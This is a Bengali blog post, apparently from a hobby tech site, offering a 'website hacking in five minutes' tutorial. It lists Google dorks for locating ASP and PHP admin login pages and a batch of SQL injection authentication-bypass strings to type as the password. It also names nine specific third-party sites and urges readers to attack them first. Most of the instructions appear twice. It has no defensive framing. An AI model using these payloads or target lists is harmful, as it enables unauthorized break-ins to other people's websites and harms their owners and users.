আজ দেখাব মাত্র ৫ মিনিটে কিভাবে একটি ওয়েবসাইট হ্যাক করতে হয়। আমার মনে হয় আপনি এই নিয়মটা শিখার জন্য অনেক আগ্রহী হয়ে বসে আছে।আসুন শিখে ফেলি কিভাবে ৫ মিনিটে একটা ওয়েবসাইট হ্যাকিং করতে হয়।
এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব। হ্যাকিং শুরু করুন।
* প্রথমে আমরা যাব www.google.com এ।
* এবার Search বক্সে নিচের যে কোন একটি Google dork/sql injection লিখুন।
* আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
* যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…
* এখানে ইউজার নেম দিনঃ Admin
* তাহলে পাসওয়ার্ড কি দিবেন ? নিচের থেকে যে কোন একটি দিন ।
* নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিনঃ
* তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…
* এবার submit এ ক্লিক করুন।
* ব্যস কাজ শেষ আপনি এখন ঐ সাইট এর এডমিন ।
মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে।
নিচে কিছু vulnerable সাইট দিলাম যাতে কষ্ট করে আপনাকে গুগল এ খুজতে না হয় । তাহলে নিচের সাইট গুলা আগে হ্যাক করুনঃ
www.sunmarytrust.org/adminlogin.asp
www.arcvns.com/admin.asp
www.amskrupajal.org/AdminLogin.asp
www.quickwrench.com/Admin/adminlogin.asp
www.adyar.net/Adminlogin.asp
www.ringjordan.com/AdminLogin.asp
www.preventivecardiology.in/adminlogin.asp
www.udesa.co.za/admin/login.asp
www.railgourmet.com/admin/admin-login.asp
গুগল এ খুজলে আপনি হাজার হাজার vulnerable সাইট পাবেন ।
হ্যাকিং নিয়ে আরও অনেক কথা হবে ।
আমাদের টেকনোট্রিক বিডি এর সাথে থাকুন ।
কমেন্ট করতে আশা করি ভুলবেন না ।স
বাইকে ধন্যবাদ ।
এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব। হ্যাকিং শুরু করুন।
* প্রথমে আমরা যাব www.google.com এ।
* এবার Search বক্সে নিচের যে কোন একটি Google dork/sql injection লিখুন।
* আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
* এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।* যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…
welcome to xxxxxxxxxx administrator panel
username :
password :
* তাহলে পাসওয়ার্ড কি দিবেন ? নিচের থেকে যে কোন একটি দিন ।
* নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিনঃ
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
username:Admin
password:'or'1'='1
* ব্যস কাজ শেষ আপনি এখন ঐ সাইট এর এডমিন ।
মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে।
নিচে কিছু vulnerable সাইট দিলাম যাতে কষ্ট করে আপনাকে গুগল এ খুজতে না হয় । তাহলে নিচের সাইট গুলা আগে হ্যাক করুনঃ
www.sunmarytrust.org/adminlogin.asp
www.arcvns.com/admin.asp
www.amskrupajal.org/AdminLogin.asp
www.quickwrench.com/Admin/adminlogin.asp
www.adyar.net/Adminlogin.asp
www.ringjordan.com/AdminLogin.asp
www.preventivecardiology.in/adminlogin.asp
www.udesa.co.za/admin/login.asp
www.railgourmet.com/admin/admin-login.asp
গুগল এ খুজলে আপনি হাজার হাজার vulnerable সাইট পাবেন ।
হ্যাকিং নিয়ে আরও অনেক কথা হবে ।
আমাদের টেকনোট্রিক বিডি এর সাথে থাকুন ।
কমেন্ট করতে আশা করি ভুলবেন না ।স
বাইকে ধন্যবাদ ।
